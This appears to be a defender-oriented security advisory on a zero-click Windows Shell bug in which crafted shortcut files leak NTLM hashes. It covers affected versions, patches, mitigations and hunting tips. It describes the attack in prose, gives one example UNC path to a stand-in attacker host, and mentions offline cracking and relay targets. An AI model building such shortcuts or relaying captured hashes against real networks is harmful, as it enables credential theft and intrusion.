Microsoft on April 27 quietly updated its advisory for CVE-2026-32202 to mark the bug “Exploitation Detected,” and CISA followed two days later by adding it to the Known Exploited Vulnerabilities catalog with a May 12 remediation deadline for federal civilian agencies. The flaw was already patched in the April 14 Patch Tuesday release, but Microsoft initially published it with a low exploitability rating and no active-exploitation flag — meaning most defenders deprioritized it. That assessment was wrong.

CVE-2026-32202 is a zero-click NTLM credential-coercion bug in Windows Shell. It was discovered by Akamai researcher Maor Dahan while he was auditing Microsoft’s February 2026 fix for CVE-2026-21510, an LNK-handling zero-day that APT28 (Fancy Bear) had been chaining with CVE-2026-21513 to bypass SmartScreen and execute code from weaponized shortcuts. Microsoft’s February patch closed the RCE and SmartScreen-bypass legs of the chain — but left a third path open: the LNK-to-NTLM coercion behavior the same code path still permitted.

How the Coercion Works

When Windows Explorer renders a folder, it parses every .lnk file in that folder to fetch icons and resolve targets. A maliciously crafted shortcut can embed a UNC path — \\attacker.example\share\icon.ico — pointing at an attacker-controlled SMB server. Windows Shell resolves the path without checking the network zone, which triggers an automatic SMB connection. The connection initiates an NTLM authentication handshake, and the victim’s machine transmits its Net-NTLMv2 hash to the attacker before the user has clicked anything.

The user does not need to double-click the shortcut. They do not need to open it. Simply navigating to a folder containing the LNK — including the Downloads folder after a drive-by download, an attached ZIP that auto-extracts, or a network share opened via a phishing link — is enough. From the attacker’s perspective, this is an offline-crackable hash plus a relay primitive. Captured Net-NTLMv2 hashes can be cracked offline with Hashcat against weak passwords, or relayed in real time to LDAP, MSSQL, ADCS, or SMB endpoints that don’t enforce signing — which, in most enterprise networks, is still a non-trivial subset.

Microsoft assigned the bug a CVSS of 4.3, reflecting the limited direct impact (information disclosure of an NTLM hash). That number is misleading. In practice, NTLM relay is the entry vector for privilege escalation across most Active Directory environments, and “zero-click on folder browse” is roughly the highest-impact delivery mechanism for a coercion primitive that exists.

Affected Versions

Practically every supported Windows release. Microsoft’s advisory lists Windows 10 (1607, 1809, 21H2, 22H2), Windows 11 (22H3, 23H2, 24H2, 25H2, 26H1), and Windows Server 2012 through Windows Server 2025. The fix is in the April 2026 cumulative update — KB5083769 for Windows 11 24H2/25H2, with parallel KBs for the other channels.

Why This One Is Worse Than the CVSS Suggests

Three things make CVE-2026-32202 a higher priority than the score implies:

The APT28 link. The original CVE-2026-21510 was an APT28 weapon. The same TTPs — LNK delivery via phishing or watering-hole — port directly to the new variant with a smaller payload (no executable, just a UNC). Threat actors who already have working LNK templates from the February campaign are well positioned to retool.

The detection blind spot. Microsoft’s incorrect exploitability metadata on April 14 means many enterprises will have rolled the April patch through their normal cycle without flagging hosts that hadn’t yet been updated. Two weeks of exploitation against unpatched fleet is a real window.

The relay surface. Every time a Windows host without SMB signing or LDAP channel binding sees an NTLM authentication, it is a candidate for relay. The April 2026 Microsoft data still shows a meaningful fraction of enterprise domain controllers without LDAP signing enforced.

What To Do This Weekend

Patch. KB5083769 (or the parallel cumulative for your channel) closes the bug. Verify deployment status across your fleet — Defender for Endpoint, SCCM, Intune, or whatever inventory you trust. The CISA KEV deadline for federal agencies is May 12; private-sector defenders should aim for the same window or sooner.

If patching is blocked on a subset of hosts (legacy apps, change windows, etc.), the compensating controls are well known: enforce SMB signing on clients and servers, block outbound TCP/445 and TCP/139 at the perimeter (and on host firewalls if your environment can tolerate it), enable LDAP channel binding and signing on all domain controllers, and enable Extended Protection for Authentication on IIS and Exchange. Disabling NTLM entirely is the long-term fix, but the short-term reality is that NTLM relay defenses — signing, channel binding, EPA — are what stop this primitive from chaining into domain compromise.

For threat hunters: look for outbound SMB connections to non-corporate IPs, particularly from user workstations that have no business reaching external file shares. Akamai’s writeup includes a Sigma rule and IOCs.

References